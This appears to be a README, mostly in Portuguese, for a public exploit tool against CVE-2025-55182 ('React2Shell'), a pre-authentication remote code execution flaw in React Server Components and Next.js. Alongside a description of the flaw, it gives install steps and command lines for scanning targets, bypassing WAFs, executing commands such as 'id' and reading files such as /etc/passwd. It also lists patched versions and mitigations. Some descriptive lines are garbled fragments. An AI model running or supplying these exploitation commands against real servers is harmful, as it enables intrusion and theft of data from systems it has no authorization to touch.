
Exploit de RCE pré-autenticação para o CVE-2025-55182 (React2Shell) direcionado a Componentes de Servidor React. Inclui varredura, verificação OAST, bypass de WAF, execução de comandos e leitura de arquivos.
Execução Remota de Código (RCE) sem autenticação em React Server Components (RSC), Next.js e frameworks relacionados.
CVE-2025-55182 (também conhecida como React2Shell) é uma vulnerabilidade crítica de RCE sem autenticação que afeta o ecossistema React Server Components (RSC). Um atacante não autenticado pode comprometer totalmente um servidor vulnerável com uma única requisição HTTP POST maliciosa.
React Server Components usa um formato de serialização personalizado chamado React Flight para serializar referências de funções e chamadas de módulos. A vulnerabilidade reside no mecanismo de decodificação de payload que processa requisições POST recebidas nos endpoints RSC.
Quando o servidor recebe um payload React Flight, ele desserializa o conteúdo sem validação adequada, confiando em campos $$typeof controlados pelo atacante e na resolução de referências de módulo. Isso permite que um atacante:
child_process, fs, net)$F (função)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H = 10.0 Critical
id, whoami)./etc/passwd, package.json).git clone https://github.com/SentinelXofficial/CVE-2025-55182
cd CVE-2025-55182
pip install -r requirements.txt
Usage
Basic Scan
python3 poc.py -t https://target.com
python3 poc.py -t https://target.com --timeout 15
python3 poc.py -t https://target.com --json
Verify RCE with OAST
python3 poc.py -t https://target.com -m verify --oast your.oast.domain
Full Bypass Testing
python3 poc.py -t https://target.com -m bypass --verbose
Execute Commands
python3 poc.py -t https://target.com -m exec --cmd "id"
python3 poc.py -t https://target.com -m exec --cmd "whoami" --timeout 20
Read Files
python3 poc.py -t https://target.com -m read --file "/etc/passwd"
python3 poc.py -t https://target.com -m read --file "/app/package.json"
Using a Proxy (e.g., Burp Suite)
python3 poc.py -t https://target.com --proxy http://127.0.0.1:8080
CVE-2025-55182/
├── README.md
├── poc.py
├── requirements.txt
└── exploit/
├── __init__.py
├── payloads.py
├── scanner.py
├── bypass.py
└── rce.py
npm install [email protected]
npm install [email protected] [email protected]
· Desabilitar Server Functions ("use server") · Regras de WAF para bloquear Content-Type: text/x-component · Segmentação de rede para endpoints RSC
· https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components · https://www.cve.org/CVERecord?id=CVE-2025-55182 · https://nvd.nist.gov/vuln/detail/CVE-2025-55182
Aviso: Apenas para testes de segurança autorizados.
Autor: SentinelX · https://t.me/SentinelXsecurity
| Pacote | Vulnerável | Corrigida |
|---|
react-server-dom-webpack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-parcel | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
react-server-dom-turbopack | 19.0.0 – 19.2.0 | ≥ 19.2.1 |
next (13.x) | 13.3.0 – 13.5.x | ≥ 14.2.35 |
next (14.x) | 14.0.0 – 14.2.34 | ≥ 14.2.35 |
next (15.x) | 15.0.0+ (ver patch) | versões corrigidas |